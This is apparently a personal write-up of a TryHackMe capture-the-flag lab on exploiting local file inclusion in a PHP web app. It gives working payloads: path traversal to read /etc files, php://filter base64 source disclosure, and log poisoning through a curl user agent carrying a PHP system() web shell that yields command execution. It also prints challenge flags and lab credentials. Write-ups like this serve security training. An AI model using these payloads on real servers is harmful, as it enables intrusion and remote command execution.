LogoLogo
  • 🤩Welcome!
  • Buffer overflow
    • Remote Buffer Overflow
      • Crashing the Application
      • Controlling the EIP
      • Finding Bad Characters
      • Finding a Return Address
      • Generating Shellcode
      • Getting a Shell
  • Wireless Penetration Testing
    • Wifi Pineapple - Tetra
      • Setup
      • Firmware Upgrade
      • Capturing Wireless Handshake
      • Cracking WPA2 Handshake
      • PineAP
      • Modules
  • PortSwigger Labs
    • Authentication
      • Username enumeration via different responses
      • Username enumeration via subtly different responses
      • Username enumeration via response timing
  • TryHackMe
    • 🎄Advent of Cyber 3 (2021)
      • [Day 1] Save The Gifts
      • [Day 2] Elf HR Problems
      • [Day 3] Christmas Blackout
      • [Day 4] Santa's Running Behind
      • [Day 5] Pesky Elf Forum
      • [Day 6] Patch Management Is Hard
      • [Day 7] Migration Without Security
      • [Day 8] Santa's Bag of Toys
      • [Day 9] Where Is All This Data Going
  • Google Cloud Computing
    • ☁️Cloud Computing Fundamentals
      • Getting Started with Cloud Shell and gcloud
      • Creating a Virtual Machine
      • App Engine: Qwik Start - Python
      • Cloud Functions: Qwik Start - Command Line
      • Kubernetes Engine: Qwik Start
      • Set Up Network and HTTP Load Balancers
Powered by GitBook
On this page

Was this helpful?

  1. TryHackMe
  2. Advent of Cyber 3 (2021)

[Day 6] Patch Management Is Hard

{Web Exploitation = LFI}

Previous[Day 5] Pesky Elf ForumNext[Day 7] Migration Without Security

Last updated 3 years ago

Was this helpful?

Challenge

Accessing the webserver returns the following.

Inspecting the URL revealed that the application was invoking the error message from a given file.

Deploy the attached VM and look around. What is the entry point for our web application?

  • err

Replacing the error file with /etc/passwd seemed to return the file and confirm the LFI vulnerability.

http://10.10.109.239/index.php?err=../../../../../etc/flag

Use the entry point to perform LFI to read the /etc/flag file. What is the flag?

  • THM{d29e08941cf7fe41df55f1a7da6c****}

Next, to get the source code of a particular file, I used the PHP filter method as shown below.

http://10.10.109.239/index.php?err=php://filter/convert.base64-encode/resource=index.php

Decoding the base64 value then led me to the next flag.

Use the PHP filter technique to read the source code of the index.php. What is the $flag variable's value?

  • THM{791d43d46018a0d89361dbf60d5d****}

In the source code, I noticed that there is a file called creds.php and manage.php

manage.php redirects to login.php. This is where the creds.php comes in handy. I used the same filter technique to read the contents of the creds.php file.

http://10.10.103.198/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php
<?php 
$USER = "McSkidy";
$PASS = "A0C315Aw3s0m";
?

Now that you read the index.php, there is a login credential PHP file's path. Use the PHP filter technique to read its content. What are the username and password?

  • McSkidy:A0C315Aw3s0m

Logging into the Control System and accessing Password Recovery reveals the next flag.

Use the credentials to login into the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server?

  • THM{552f313b52e3c3dbf5257d8c6db7****}

Now that I had access to logs, know where the file is located, and was able to write to the file via web requests, I used the log poisoning method to get remote command execution on the system.

http://10.10.103.198/logs.php

I first poisoned the logs by sending a request with curl and setting a PHP payload as the user agent as shown below. The payload basically allows an attacker to run arbitrary commands remotely, on the server via the browser.

curl -A '<?php system($_GET["cmd"]); ?>' http://10.10.103.198/login.php

Following that, I invoked the logfile via LFI and simply added a cmd argument in the URL and ran commands on the server.

http://10.10.103.198/index.php?err=./includes/logs/app_access.log&cmd=ls
http://10.10.103.198/index.php?err=./includes/logs/app_access.log&cmd=hostname

The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.

  • lfi-aoc-awesome-59aedca683fff9261263bb084880c965

🎄